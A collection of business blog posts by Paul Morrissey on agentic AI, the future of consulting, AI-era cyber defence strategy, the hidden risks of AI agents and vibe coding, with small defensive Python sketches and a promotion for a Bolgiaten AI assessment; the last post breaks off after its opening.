Author: Paul Morrissey

  • From Software to Digital Colleagues: Why the Next Business Platform is Agentic AI

    Over the past decade I have written extensively about the rise of Software‑as‑a‑Service (SaaS) and how it reshaped the structure of the digital economy. In several earlier blogs I explored what I described as the “vulnerability of SaaS” in the emerging world of Agentic AI.

    At the time, some readers interpreted that argument as a criticism of SaaS itself.
    That was never the intention. SaaS was one of the most powerful technology and commercial innovations of the last twenty years. But every technology wave eventually becomes infrastructure for the next one. What we are now witnessing is precisely that transition.

    The shift underway is not simply about better software. It is about the emergence of digital workers – autonomous, AI‑driven agents capable of performing tasks, coordinating processes, and increasingly making operational decisions. In other words, we are moving from software that people use to systems where software itself does the work.

    This is the real meaning of Agentic AI. And if that trajectory continues – which the evidence increasingly suggests it will – the dominant commercial model will evolve from Software‑as‑a‑Service to something far more profound: Digital Workers‑as‑a‑Service.

    The End of the Software Interface Era

    To understand why this matters, we need to step back and look at how enterprise technology has evolved. For decades, enterprise software was designed around the assumption that a human user would sit at the centre of every process. Software provided the tools, dashboards, and workflows, while humans executed the tasks. SaaS refined that model brilliantly. Instead of installing complex enterprise systems, organisations subscribed to cloud platforms that were continuously updated, scalable, and relatively easy to integrate.

    • Salesforce transformed customer relationship management.
    • Workday modernised HR systems.
    • ServiceNow digitised enterprise workflows.

    But in every case the operating model remained the same: people used software. Agentic AI disrupts that assumption.

In an agentic system, the software no longer waits for instructions. It observes data, interprets goals, and executes actions autonomously. Human involvement shifts from execution to supervision. The implication is profound: the primary “user” of enterprise systems may increasingly be another piece of software. When that happens, the entire design logic of SaaS begins to change.

    From Applications to Digital Labour

    What makes this moment particularly interesting is that we are already seeing early evidence of the transition. In China, logistics giants such as Alibaba and JD.com have deployed AI systems that autonomously optimise supply chain routing across thousands of delivery points in real time. The system continuously adjusts warehouse allocation, delivery routes, and inventory positioning without human intervention.

    In the financial sector, JPMorgan’s COiN platform analyses complex legal contracts using machine learning, performing in seconds tasks that previously required thousands of hours of manual legal work.

    Meanwhile, in Europe, telecommunications operators are increasingly deploying AI agents to manage network optimisation. Rather than engineers manually monitoring network performance, autonomous systems detect anomalies, predict congestion, and automatically adjust network parameters.

    Even in customer operations the shift is visible.
    Swedish fintech company Klarna recently reported that its AI assistant now performs work equivalent to hundreds of customer service agents, handling millions of conversations with customers across multiple markets.

    These examples are not isolated experiments.
They represent early manifestations of a new organisational capability: digital labour.

Lowering the Barrier to Adoption

Despite the promise, however, the deployment of agentic systems remains uneven. Research across global enterprises consistently shows that while organisations are experimenting heavily with AI, relatively few have managed to scale autonomous agents across their operations. The reasons are not difficult to understand. Building agentic systems requires a combination of capabilities that many organisations simply do not possess: data infrastructure, orchestration frameworks, governance models, and the ability to continuously train and monitor AI systems.

This is precisely where a new commercial model begins to emerge. Instead of building digital workers internally, organisations can increasingly subscribe to them. In the same way that SaaS allowed businesses to consume software without managing infrastructure, Digital Workers‑as‑a‑Service allows organisations to deploy autonomous agents without building the underlying AI architecture themselves.

    The analogy with cloud computing is striking. Few companies today build their own data centres. Instead they rely on cloud providers such as Amazon Web Services, Microsoft Azure, or Google Cloud. The same dynamic is beginning to appear with agentic AI.

Specialist providers are developing domain‑specific digital workers that can be deployed across industries: compliance agents, procurement agents, supply chain optimisation agents, and financial reconciliation agents. For smaller organisations in particular, this model dramatically lowers the barrier to entry. A mid‑sized manufacturer, for example, may never build an advanced AI operations platform internally. But subscribing to a digital supply chain agent that continuously optimises production schedules is entirely feasible.

    New Business Models Emerge

This is where the real strategic opportunity lies. In previous technology waves, the companies that dominated were those that recognised how to translate technical capability into scalable commercial models. Google and Amazon emerged from the early internet economy. Salesforce and ServiceNow defined the SaaS era. Agentic AI will produce its own generation of platform leaders.

But the opportunity is not limited to technology companies. One of the most interesting possibilities is that organisations will begin to package their own operational expertise as digital workers. Consider a global logistics firm that has spent decades refining supply chain optimisation algorithms. Instead of simply using those capabilities internally, the company could offer autonomous logistics agents to other businesses as a service.

    A legal consultancy could deploy AI agents trained on its regulatory expertise to act as automated compliance advisors for smaller companies. A cybersecurity firm could provide continuous AI‑driven threat monitoring agents that operate across thousands of client networks simultaneously. In each case, the company is no longer selling software. It is selling operational capability. That distinction matters enormously.

    Governance and Trust

Of course, the rise of digital workers also introduces new governance challenges. In earlier writing I have argued that AI governance must evolve beyond traditional IT risk management. When organisations deploy autonomous agents capable of executing decisions, oversight frameworks must address transparency, accountability, and human supervision.

Encouragingly, regulators and international organisations are already moving in this direction. The European Union’s AI Act establishes risk classifications for AI systems and mandates governance controls for high‑impact deployments. Similarly, the OECD and various industry bodies have developed frameworks for responsible AI deployment that emphasise auditability, human oversight, and ethical safeguards.

    In practice, organisations adopting digital workers will need new internal capabilities: AI supervision roles, model validation processes, and operational guardrails. Digital workers may perform tasks, but accountability will always remain human.

    Why Leaders Should Pay Attention Now

    One of the most consistent lessons in technology history is that early signals of structural change are often underestimated. Cloud computing initially appeared to be simply a more convenient way of delivering software. In reality it reshaped the economics of the entire technology sector. Agentic AI may prove to be an equally transformative shift.

When digital workers become widely deployable through service models, the cost structure of organisations begins to change. Routine operational tasks can be automated at scale, allowing human employees to focus on creativity, strategy, and complex decision‑making. Importantly, this does not imply the disappearance of human work. Rather, it signals the emergence of hybrid organisations where human and digital workers collaborate.

    In many ways, the future enterprise may resemble a mixed workforce composed of people and autonomous systems working together. For business leaders, the strategic question is not whether this shift will occur. It is how quickly.

    Organisations that begin experimenting with agentic systems today will develop the operational knowledge needed to manage digital workforces tomorrow. Those that delay may find themselves competing against companies whose operational efficiency has been radically transformed by autonomous systems.

    Conclusion

When I wrote about the vulnerability of SaaS in the age of Agentic AI, the argument was not that SaaS would disappear. Far from it. SaaS will remain a critical foundation of enterprise technology. But its role is changing. Instead of being the destination, SaaS increasingly becomes the infrastructure layer upon which autonomous digital workers operate.

We are witnessing the emergence of a new organisational paradigm: the digital workforce. And just as cloud computing democratised access to computing power, Digital Workers‑as‑a‑Service may democratise access to advanced AI capability.

If that happens, the next decade of business innovation will not simply be driven by better software. It will be driven by autonomous systems that work alongside us, augmenting human capability and reshaping how organisations operate. The companies that recognise this shift early will not just adopt new technology. They will redesign how work itself is done!

  • Beyond the Collapsing Pyramid

    Why AI will make great consulting more valuable, not less — and why Bolgiaten’s AI Maturity Assessment is becoming an essential boardroom tool.

    The old consulting pyramid was built on leverage. The next generation of consulting will be built on judgment, governance, enterprise design, and the human leadership needed to turn AI from a tool into a transformation.

    For decades, the consulting business was built on a familiar structure: a broad base of junior analysts and associates feeding insight upward to a narrow band of partners and senior advisers. That model rewarded scale. Firms could deploy teams of smart graduates to gather data, build decks, perform benchmarking, document processes, and power the analysis behind recommendations. It was efficient, profitable, and deeply entrenched.

    Artificial intelligence is now breaking that structure apart.

    The market has been quick to notice the obvious part of the story: work once assigned to junior consultants can increasingly be completed faster, cheaper, and often more consistently by AI-enabled tools. Research synthesis, first-draft presentations, pattern recognition, market scanning, scenario generation, and parts of due diligence no longer require the same labor model they did even two years ago. In professional services, this is not a marginal productivity gain. It is a structural shock.

    Yet this is only half the truth. The deeper truth is more important for clients, advisers, and firms deciding what kind of business they want to become. The same force that is eroding the old consulting pyramid is creating a much larger market for a new kind of consultancy: one built on judgment, enterprise architecture, governance, change leadership, and the disciplined translation of AI capability into operating reality.

    This is the paradox at the heart of consulting’s AI moment. AI destroys low-level advisory work while simultaneously expanding the need for high-value advisory work.

    The New Scarcity Is Not Analysis. It Is Integration.

    The analytical scarcity that once justified large consulting teams is fading. What organizations increasingly lack is not information, but the ability to integrate AI safely, strategically, and at scale. Many enterprises now have pilots, proofs of concept, and isolated use cases. Far fewer have an enterprise-wide model that links AI strategy to governance, process redesign, workforce capability, data readiness, risk controls, and measurable commercial outcomes.

    That gap is where the next generation of consulting value sits.

    Recent global research points to the same conclusion from different angles. McKinsey has reported that while almost all companies are investing in AI, only a tiny minority describe themselves as genuinely mature in adoption, and the major barriers are leadership alignment, operating change, and scaling discipline rather than employee enthusiasm alone. NIST’s AI Risk Management Framework reinforces that AI deployment is not simply a technical issue but a governance and lifecycle challenge. The OECD’s AI Principles and its recent work on enterprise adoption likewise emphasize trustworthy governance, human-centered design, transparency, and capability-building as prerequisites for durable value creation. In Europe, the phased implementation of the EU AI Act is pushing organizations to translate AI ambition into documented controls, accountability, literacy, and risk-based operating practices.

    Taken together, these developments point to a simple reality: enterprises do not need more AI theatre. They need AI orchestration.

    This is why senior advisory work is becoming more valuable. The enterprise challenge is no longer “Can AI do this task?” It is now “How should this business redesign itself so that AI creates measurable value without creating unmanaged risk, fragmented workflows, regulatory exposure, or employee resistance?”

    That question cannot be answered by a chatbot alone.

    From Project Work to Enterprise Transformation

    The strongest global practice is moving beyond isolated use cases towards enterprise transformation. Leading organizations are not treating AI as a bolt-on technology layer. They are redesigning decision flows, clarifying governance, upgrading data foundations, defining accountable ownership, and investing in AI literacy across both executives and delivery teams.

    In practical terms, best practice now rests on six connected disciplines.

    First, strategy. High-performing organizations are explicit about where AI will create value and where it will not. They prioritize a small number of mission-critical business outcomes rather than chasing dozens of disconnected experiments.

    Second, operating model. AI needs a home inside the organization. That means clear sponsorship, role definition, investment logic, model ownership, and a decision-rights framework that prevents innovation from becoming chaos.

    Third, data and technology foundations. AI maturity is constrained by the quality, accessibility, and governance of enterprise data. No amount of enthusiasm compensates for poor metadata, fragmented systems, or weak integration architecture.

    Fourth, governance and trust. Responsible AI is no longer a compliance side note. It is a business requirement. Firms need controls around model risk, human oversight, security, auditability, third-party tools, and policy compliance. This is especially urgent for regulated sectors and for organizations operating across jurisdictions.

    Fifth, workforce and change. The organizations that succeed treat AI adoption as a human transformation. They redesign roles, reallocate work, retrain managers, and engage employees early. Change management is not the packaging around the transformation; it is the transformation.

    Sixth, value realization. Mature adopters define metrics in advance. They measure cycle-time reduction, cost-to-serve, quality uplift, revenue impact, risk reduction, and adoption depth. Without this discipline, AI becomes another innovation story rather than a business result.

    Every one of these domains is advisory-intensive. None can be solved by technology procurement alone. This is why consulting is not disappearing. It is being re-priced around deeper capability.

    Why the Old Pyramid Is Collapsing

    The traditional consulting pyramid assumed that clients would continue paying for labor-intensive analytical assembly. That assumption no longer holds. If AI can compress work that once took five analysts and two weeks into a few hours of guided review, then the economics of leverage change dramatically. Clients will be less willing to fund armies of junior staff producing outputs that can now be generated, compared, and refined by machines.

    This does not mean junior talent becomes irrelevant. It means the apprenticeship model must change. Tomorrow’s consultants will need stronger problem framing, industry context, facilitation, governance awareness, and data fluency much earlier in their careers. The premium will shift away from producing slides and toward shaping decisions.

    For consulting firms, this creates a stark strategic choice. They can defend the old model and watch margins erode, or they can redesign around senior expertise, domain-led teams, AI-enabled delivery, and repeatable transformation frameworks. The winners will not be those with the largest bench. They will be those with the clearest method for helping clients move from experimentation to enterprise maturity.

    The Bolgiaten Proposition: AI Maturity Assessment as a Strategic Entry Point

    This is exactly why Bolgiaten’s AI Maturity Assessment is not a nice-to-have diagnostic. It is an essential executive instrument.

    Most enterprises are currently trapped between ambition and execution. Boards want AI value. Business units want faster tools. Risk teams want assurance. IT wants standardization. HR worries about capability and workforce impact. Legal and compliance want clarity on obligations. Everyone is right, but very few organizations have a common picture of where they actually stand.

    An AI Maturity Assessment solves that problem.

    At its best, such an assessment gives leadership a clear, evidence-based view of current capability across the dimensions that matter most: strategy, governance, data readiness, technology architecture, operating model, workforce capability, responsible AI controls, and value realization. It reveals where the enterprise is genuinely ready, where it is exposed, where investment should be prioritized, and what sequence of actions will unlock scale.

    For Bolgiaten, this creates a compelling market proposition.

    First, it establishes a trusted advisory entry point. Instead of selling abstract AI transformation, Bolgiaten can begin with a structured diagnosis grounded in enterprise reality.

    Second, it converts uncertainty into a roadmap. Clients do not simply receive a score; they receive a staged transformation pathway tied to business outcomes, risk posture, and organizational readiness.

    Third, it creates board-level relevance. AI has now moved into the language of competitiveness, resilience, compliance, and workforce redesign. An assessment translates technical noise into executive decisions.

    Fourth, it opens downstream consulting opportunities. Once maturity gaps are visible, the follow-on demand becomes clear: governance frameworks, operating model redesign, use-case prioritization, AI policy development, vendor evaluation, workforce capability building, and enterprise change management.

    In other words, the assessment is both a client value tool and a consultancy growth engine.

    Why This Is a Massive Consultancy Opportunity

    The opportunity is massive because nearly every medium and large enterprise now needs the same sequence of support. They need to understand their AI maturity. They need to prioritize use cases. They need to redesign processes. They need to establish governance. They need to upskill leaders and teams. They need to embed trust, compliance, and accountability. And they need to prove measurable value.

    That demand is horizontal across industries and vertical within them. Financial services, telecoms, public sector, logistics, infrastructure, energy, health, and professional services all face the same core challenge: AI cannot remain a pilot portfolio. It must become an enterprise capability.

    This is precisely the territory where seasoned consulting earns its keep. The work is cross-functional, politically sensitive, operationally complex, and deeply human. It requires facilitation, judgment, pattern recognition, and the ability to move senior stakeholders from fragmented enthusiasm to coordinated action.

    That is why the future consultancy will look different. It will be smaller at the base, stronger at the center, and far more valuable at the top. It will use AI aggressively in delivery, but it will sell wisdom, not labor. It will package diagnostics, roadmaps, governance architectures, and transformation methods. It will blend technology fluency with organizational design and change capability.

    The Bottom Line

    The consulting industry is not facing extinction. It is facing selection.

    The firms under pressure are those still organized around work that AI now performs adequately. The firms that will grow are those that understand AI as a force that raises the premium on human judgment. As analytical work becomes automated, the value migrates upward to synthesis, leadership, architecture, governance, and change.

    The pyramid is collapsing. But what rises from its foundations will be something more strategic and more durable: a professional services model built not on scale, but on wisdom; not on volume, but on vision.

    And in that new model, tools such as Bolgiaten’s AI Maturity Assessment will become indispensable. They provide the starting point every serious enterprise now needs: an honest view of readiness, a practical route to maturity, and a disciplined bridge from AI ambition to enterprise performance.

    That is not simply a service offering. It is the gateway to the next great consultancy market.

Bolgiaten offers a free one-hour consultation with Professor Paul Morrissey to discuss this and other related AI issues across your organization. To arrange one, please send a request to PJM@bolgiaten.com.

  • Rethinking Cyber Defense Across Multiple Attack Surfaces

    Whenever technology evolves, cyber threats evolve alongside it. The arrival of autonomous and agentic artificial intelligence is accelerating that evolution in ways that many organisations are only beginning to understand. The real shift is not simply the automation of attacks, but the emergence of penetration at scale across multiple attack surfaces.

    In practical terms, this means attackers will increasingly be able to automate the entire attack cycle—from reconnaissance and vulnerability discovery to credential compromise, data extraction, and deception-based intrusion. AI systems can simultaneously probe identities, applications, networks, cloud environments and human decision-makers. The result is not a single attack vector but a coordinated campaign that unfolds across an organisation’s entire digital ecosystem.

    This represents a profound departure from the traditional model of cyber intrusion. Historically, human attackers focused their attention on a limited number of targets, investing time in reconnaissance before launching an intrusion. Artificial intelligence changes that equation dramatically. Autonomous tools can continuously scan for vulnerabilities across thousands or millions of potential targets, learning from each interaction and refining their approach in real time.

    The implication is clear: the future threat environment is defined by scale, persistence and simultaneous pressure across multiple attack surfaces.

    Penetration at AI Scale

    Human cybercriminals have historically been constrained by time and operational capacity. Identifying vulnerable systems, crafting convincing phishing campaigns, or attempting credential theft required careful manual effort. AI-enabled systems remove many of these constraints.

    Autonomous tools can perform reconnaissance continuously, mapping attack surfaces across identities, APIs, cloud infrastructure, and enterprise systems. They can generate and test thousands of phishing messages, automatically adapt social engineering techniques, and exploit exposed credentials within minutes of discovery.

    The attack does not occur in a single place. Instead, it unfolds across multiple surfaces simultaneously:

    • Identity systems such as authentication platforms and privileged accounts
    • Cloud infrastructure and software-as-a-service environments
    • APIs and interconnected digital services
    • AI models and data pipelines themselves
    • Human users targeted through increasingly convincing deception

    This is what penetration at scale looks like: not one entry point, but many potential openings tested continuously until one succeeds.

    And once access is achieved, AI-driven tools may accelerate lateral movement, privilege escalation and data discovery far more quickly than human attackers could manage. Sensitive data can be identified, aggregated and exfiltrated automatically, while malicious software can be inserted to enable future exploitation.

    At the same time, organisations themselves are rapidly deploying AI agents across their operations—from customer service and internal knowledge management to supply chains and decision support. While these systems deliver clear efficiency gains, they also introduce new vulnerabilities and attack surfaces that traditional cybersecurity frameworks were not designed to address.

    In particular, researchers have highlighted the risk of prompt injection attacks, data poisoning, model manipulation and agent misalignment. These vulnerabilities allow malicious actors to manipulate AI systems themselves, turning internal automation tools into potential attack vectors.

    In short, the defensive environment is becoming more complex at the same moment that offensive capability is becoming more automated.

    A New Cybersecurity Landscape

    We are therefore entering a new phase of cybersecurity where defence must operate at the same scale and speed as AI-enabled threats. Reactive models of cybersecurity—where incidents are analysed and mitigated after detection—will increasingly struggle to keep pace with automated attacks unfolding in real time.

    Governments and regulators are already recognising this shift. Emerging initiatives such as AI risk management frameworks, secure AI system development guidance, and new cybersecurity standards are being developed to help organisations manage these risks. The direction of travel is clear: cybersecurity must become more proactive, predictive and resilient.

    For businesses, this means developing a cybersecurity playbook designed specifically for the AI era.

    A Cybersecurity Playbook for the Agentic Era

    Every organisation should now be developing a strategic framework that prepares it for penetration attempts occurring simultaneously across multiple attack surfaces.

    The first element of such a playbook is governance. Organisations deploying AI systems must implement clear policies defining how those systems operate, what data they can access, and how their actions are monitored. Robust identity and access management is essential, alongside detailed logging and audit mechanisms capable of tracking both human and machine decision-making.

    Second, incident response strategies must evolve. Traditional response processes assume that human analysts investigate threats and then take action. When attacks unfold at machine speed, that model becomes increasingly impractical.

    Defensive systems will need automated containment capabilities capable of isolating compromised services, revoking credentials, and limiting lateral movement in real time. This raises an important governance question for leadership teams: when should automated systems be authorised to take disruptive action in order to protect the organisation?

    In many cases, cybersecurity platforms will need authority to shut down systems or restrict operations temporarily to prevent wider compromise. Determining where those boundaries lie will become a critical leadership decision in the coming years.
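
One way to make that boundary concrete is to write it down as explicit policy that both security teams and leadership can review. The sketch below is illustrative only, not a production design: the 1-5 severity scale, the confidence thresholds, and the action names are all hypothetical assumptions.

```python
# Illustrative containment policy for machine-speed response. The severity
# scale, thresholds, and action names are hypothetical assumptions.
from enum import Enum

class Action(Enum):
    MONITOR = "monitor only"
    REVOKE_CREDENTIALS = "revoke affected credentials"
    ISOLATE_SERVICE = "isolate the compromised service"
    ESCALATE_TO_HUMAN = "page the on-call responder for approval"

def containment_action(severity: int, confidence: float,
                       business_critical: bool) -> Action:
    """Map an alert (severity 1-5, detector confidence 0-1) to a response."""
    if business_critical and severity >= 3:
        # Disruptive action against a critical system needs human sign-off.
        return Action.ESCALATE_TO_HUMAN
    if severity >= 4 and confidence >= 0.9:
        # Pre-authorised: high confidence and a contained blast radius.
        return Action.ISOLATE_SERVICE
    if severity >= 3 and confidence >= 0.8:
        # Credential revocation is reversible, so it can be automated earlier.
        return Action.REVOKE_CREDENTIALS
    return Action.MONITOR

print(containment_action(severity=4, confidence=0.95, business_critical=False))
```

The value of writing such rules down lies not in the specific thresholds but in making the boundary between automated authority and human approval explicit, reviewable and auditable.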

    Third, organisations must prioritise workforce awareness. AI-powered deception techniques—including deepfake audio, synthetic video, and highly personalised phishing—are becoming increasingly sophisticated. Security awareness cannot remain confined to IT departments; it must become a universal organisational capability.

    Employees need training to recognise emerging forms of manipulation and to understand the role they play in maintaining cyber resilience. Just as importantly, training programmes must evolve continuously as new attack techniques emerge.

Finally, organisations must remain aligned with emerging standards and frameworks. Cybersecurity policies that remain static will quickly become obsolete in a rapidly evolving threat environment. Continuous review against global best practices ensures that defensive strategies remain current.

    The Strategic Message

    If there is one central message for business leaders, it is this: the emergence of AI-enabled penetration at scale across multiple attack surfaces represents more than simply another cybersecurity threat.

    It represents a transformation of the entire threat landscape.

    Defensive strategies built for a slower, more predictable era of cyber intrusion are no longer sufficient. Organisations must now prepare for a world in which attacks occur continuously, adapt dynamically, and operate simultaneously across infrastructure, software, identities, data and human behaviour.

    In such an environment, cybersecurity resilience depends not only on stronger tools but on stronger strategy.

    The organisations that succeed will be those that recognise the scale of this transformation early, rethink their security playbooks, and build defences capable of operating at the same speed and scale as the threats they face.

  • The Hidden Risks of Unsupervised AI Agents

    Why the Real Economic Impact of AI Is Harder to Measure Than You Think.

    Over the past year I have had many conversations with executives, board members, and investors about Agentic AI and the profound changes it promises to bring to organisations. The tone of these discussions is usually enthusiastic, and understandably so.

    We are told that AI agents will unlock new revenue streams, dramatically increase productivity, and automate complex workflows across the enterprise. Marketing teams expect faster campaign creation, customer service leaders expect 24-hour support automation, finance departments expect automated reconciliation, and operations teams expect continuous optimisation. In short, everyone is focused on the upside.

    But there is a question I often ask in boardrooms and strategy sessions that tends to bring the conversation to a pause:

    How do you actually measure the real economic value of AI?

    Because while everyone is excited about the promise of increased revenue and operational efficiency, far fewer organisations are measuring the full economic impact of AI — including the hidden risks that come with deploying autonomous or semi-autonomous AI agents. And those risks can be significant.

    The Problem with Simplistic ROI Thinking

    Most AI business cases presented to CFOs follow a predictable format.

    They focus on two numbers:

    1. Revenue growth
    2. Operational efficiency

This is a reasonable starting point. AI can absolutely help organisations generate new revenue opportunities and reduce operational costs. But it is only part of the picture. What is often missing from these models is a third and much more complex factor: Intangible Benefits (IB).

    These can be positive — such as improved customer experience, faster innovation, or stronger competitive positioning.

But they can also be negative. And when negative intangibles occur in the context of AI systems, they can escalate quickly. Before discussing those risks, it helps to introduce a simple framework I often use when discussing AI economics with executive teams.

    A Practical Metric for Measuring AI Value

One way to frame the discussion with finance leaders — particularly the CFO, who is usually the most sceptical person in the room — is to express the impact of AI in terms of Economic Impact (EI) relative to the organisation’s financial scale.

    The metric I use is the following:

Economic Impact (EI) = (Δ Revenue + Δ Efficiency + Intangible Benefits) / EBITDAR

    Where:

    • Δ Revenue represents the incremental revenue generated by AI initiatives (Use Cases)
    • Δ Efficiency represents measurable improvements in productivity or cost reduction
    • Intangible Benefits (IB) capture both positive and negative strategic effects
    • EBITDAR represents Earnings Before Interest, Taxes, Depreciation, Amortisation and Restructuring (or Rent), which effectively normalises the organisation’s operating scale

    Why divide by EBITDAR?

    Because doing so contextualises the Economic Impact (EI) relative to the size of the organisation. A £5 million efficiency gain means something very different to a company with £20 million EBITDAR than it does to one with £500 million.
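
Expressed as a minimal sketch in Python, the point is easy to demonstrate. The figures below are hypothetical, and Intangible Benefits are collapsed into a single signed number, whereas in practice they would aggregate several positive and negative estimates.

```python
# A minimal sketch of the EI metric. All figures are hypothetical; a negative
# IB models unpriced risks such as data leakage or reputational damage.
from dataclasses import dataclass

@dataclass
class AIInitiative:
    delta_revenue: float        # Δ Revenue: incremental revenue from the use case
    delta_efficiency: float     # Δ Efficiency: measurable productivity/cost gains
    intangible_benefits: float  # IB: net strategic effects, which may be negative

def economic_impact(i: AIInitiative, ebitdar: float) -> float:
    """EI = (Δ Revenue + Δ Efficiency + IB) / EBITDAR."""
    return (i.delta_revenue + i.delta_efficiency + i.intangible_benefits) / ebitdar

# The same £5m of gross gains (with £1m of negative intangibles), scaled
# against two very different operating bases.
initiative = AIInitiative(delta_revenue=2e6, delta_efficiency=3e6,
                          intangible_benefits=-1e6)
for ebitdar in (20e6, 500e6):
    print(f"EBITDAR £{ebitdar / 1e6:.0f}m -> EI = "
          f"{economic_impact(initiative, ebitdar):.2%}")
```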

This framework gives the CFO a common financial language in which to evaluate AI initiatives. But the most important component of the equation is the one that is most frequently ignored: Intangible Benefits (IB).

    The Hidden Side of Intangible Benefits (IB)

    When organisations present AI initiatives internally, intangible benefits are usually framed in positive terms:

    • improved decision-making
    • faster response times
    • enhanced customer experiences
    • stronger brand perception

    All of these are real.

However, what is often underestimated are the negative intangible impacts that can emerge from poorly supervised AI systems, particularly when organisations begin deploying autonomous AI agents.

    AI agents are powerful because they can act independently — analysing information, making decisions, and executing tasks across multiple systems. But autonomy without governance creates new categories of risk.

    Three deserve careful attention.

    1. Data Leakage

    AI systems depend heavily on data.

    When those systems are connected to internal knowledge bases, customer records, contracts, or intellectual property, the risk of data leakage becomes significant.

    This can occur in multiple ways:

    • sensitive data being exposed through prompts or responses
    • proprietary information being incorporated into external models
    • confidential customer data being accessed or transmitted improperly

    The consequences can range from regulatory breaches to loss of competitive advantage. In highly regulated sectors — such as telecommunications, healthcare, or finance — the reputational damage alone can be considerable.
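
One narrow illustration of a preventative control is screening prompts for identifiable strings before they leave the organisation. The sketch below assumes the simple case of regex-detectable identifiers; real deployments rely on dedicated PII-detection and data-loss-prevention tooling, and the patterns here are deliberately minimal examples.

```python
# A deliberately narrow redaction pass applied to prompts before they are
# sent to an external model. The patterns are illustrative, not exhaustive.
import re

PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "UK_PHONE": re.compile(r"\b(?:\+44|0)(?:\s?\d){9,10}\b"),
}

def redact(prompt: str) -> str:
    """Replace matched identifiers with labelled placeholders."""
    for label, pattern in PATTERNS.items():
        prompt = pattern.sub(f"[REDACTED {label}]", prompt)
    return prompt

text = "Customer jane.doe@example.com on 020 7946 0958 disputes a charge."
print(redact(text))
# -> Customer [REDACTED EMAIL] on [REDACTED UK_PHONE] disputes a charge.
```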

    2. Hallucination and Customer Trust

    Large language models and AI agents can sometimes generate hallucinations — confident but incorrect responses.

    In internal workflows this may simply create inefficiencies.

    In customer-facing systems, however, the consequences can be more serious.

    Imagine an AI agent:

    • giving incorrect billing information
    • misrepresenting product capabilities
    • generating misleading compliance guidance

    The immediate impact is poor customer experience. But the deeper issue is trust erosion.

    Trust, once lost, is extremely difficult to rebuild.

    3. Model Drift

    AI systems are not static.

    Over time, models can experience drift — where their behaviour gradually deviates from expected performance.

    This may occur because:

    • the underlying data environment changes
    • feedback loops alter model behaviour
    • system updates introduce unintended bias or errors

    If drift is not detected early, the organisation may continue operating under the assumption that AI outputs remain accurate. In reality, decision quality may already be deteriorating.
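
Detection is tractable when monitoring is in place. The sketch below uses the Population Stability Index, one common heuristic for distribution shift; the ten-bin layout and the 0.2 alert threshold are widely used conventions rather than fixed standards, and the score streams are simulated for illustration.

```python
# Minimal drift monitor using the Population Stability Index (PSI).
# Scores are simulated here; in practice they would be logged model outputs.
import numpy as np

def psi(baseline: np.ndarray, current: np.ndarray, bins: int = 10) -> float:
    """PSI between a baseline score sample and a recent one."""
    edges = np.percentile(baseline, np.linspace(0, 100, bins + 1))
    current = np.clip(current, edges[0], edges[-1])  # keep values in range
    p, _ = np.histogram(baseline, bins=edges)
    q, _ = np.histogram(current, bins=edges)
    p = np.clip(p / p.sum(), 1e-6, None)  # guard against log(0)
    q = np.clip(q / q.sum(), 1e-6, None)
    return float(np.sum((q - p) * np.log(q / p)))

rng = np.random.default_rng(0)
baseline_scores = rng.normal(0.60, 0.10, 10_000)  # behaviour at sign-off
current_scores = rng.normal(0.52, 0.13, 10_000)   # behaviour this month
value = psi(baseline_scores, current_scores)
if value > 0.2:  # common rule of thumb: above 0.2 suggests material drift
    print(f"PSI = {value:.3f}: investigate drift before trusting outputs")
```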

    Reputation: The Fragile Asset

    When organisations discuss AI benefits, they often overlook the fact that reputation is one of the most valuable assets any company possesses.

    And reputation behaves asymmetrically. One bad event can wipe out thousands of positive interactions. I often summarise it in very simple terms:

    One negative event can wipe out 10,000 positive ones.

    In the context of AI, this could be:

    • a widely reported data breach
    • an AI-generated decision perceived as unethical
    • a discriminatory algorithmic outcome
    • a regulatory violation resulting from automated decision-making

    These events do not just affect operations. They affect brand trust, customer loyalty, regulatory scrutiny, and investor confidence. All of which belong squarely within the Intangible Benefits (IB) component of the economic impact equation.

    Why Governance Matters

    None of this should be interpreted as an argument against AI. Far from it.

    AI will undoubtedly become one of the most powerful productivity tools organisations have ever deployed. But the organisations that succeed will not simply deploy AI faster than others. They will deploy it more responsibly and more intelligently.

    That means introducing:

    • strong AI governance frameworks
    • human oversight for critical decisions
    • continuous model monitoring
    • robust data protection mechanisms
    • clear ethical guidelines for AI deployment

    In other words, AI should augment human judgement — not replace it entirely.

    The Conversation CFOs Need to Have

    Whenever I present the Economic Impact (EI) equation to executive teams, I emphasise one point. The equation is not just a financial model. It is a governance conversation.

    It forces leadership teams to ask:

    • What new revenue can AI truly create?
    • What measurable efficiencies will it deliver?
    • What positive intangible benefits will it generate?
    • And critically, what negative intangible risks might it introduce?

    Only by considering all four elements together can organisations measure the true economic value of AI. Because if the numerator in the equation includes hidden risks that no one is monitoring, the apparent economic impact may be overstated.

    And when those risks materialise, the consequences can be sudden and severe.

    Final Thoughts

    AI agents will undoubtedly transform how organisations operate. They will create extraordinary opportunities for automation, innovation, and growth. But as with all powerful technologies, the benefits must be balanced with careful governance and realistic economic measurement. The organisations that thrive in the AI era will not be those that chase automation blindly. They will be those that understand both the upside and the downside and measure the true economic impact accordingly.

Why This Thinking Matters in AI Readiness

This type of thinking is precisely why I developed my AI Readiness Assessment methodology. Too many organisations approach AI adoption as a technology deployment exercise rather than a strategic capability transformation.

    The purpose of the AI Readiness Assessment is to help organisations understand:

    • where they currently stand with AI maturity
    • how strong their governance and risk frameworks are
    • whether their data foundations are ready for AI deployment
    • how AI initiatives can be measured in terms of real economic impact

    More importantly, it allows organisations to design an AI journey that is measurable, risk-aware, and sustainable. In other words, it helps organisations capture the upside of AI while ensuring the hidden risks — the ones that often sit inside the “Intangible Benefits” component of the equation — are properly understood and managed.

    Because the real challenge of AI is not deploying it.

    The real challenge is deploying it responsibly, strategically, and in a way that strengthens the organisation rather than exposing it to unnecessary risk.

  • When Vibe Coding Meets the Real World: Security, Governance and the Rise of S2aaS

    The question is no longer whether AI can generate code. It clearly can. The real question is whether “vibe coded” products can be trusted, governed and secured well enough to be taken seriously inside an enterprise.

Over the past year, tools such as Claude, ChatGPT, Gemini and others have dramatically lowered the barrier to software creation. What many are now calling vibe coding allows founders, product teams and even non-engineers to produce working applications at remarkable speed. Prototypes that once took months can now appear in hours. That is genuinely transformative.

    But it also creates a dangerous illusion. The ability to generate software quickly is not the same as the ability to create software that is secure, resilient, compliant and enterprise ready. In fact, the faster code is created, the more important governance becomes. The risk is not that AI-generated code fails to compile. The risk is that it appears to work while hiding weaknesses that only emerge later under attack, under regulation, or under enterprise scrutiny.

    Where the problem begins

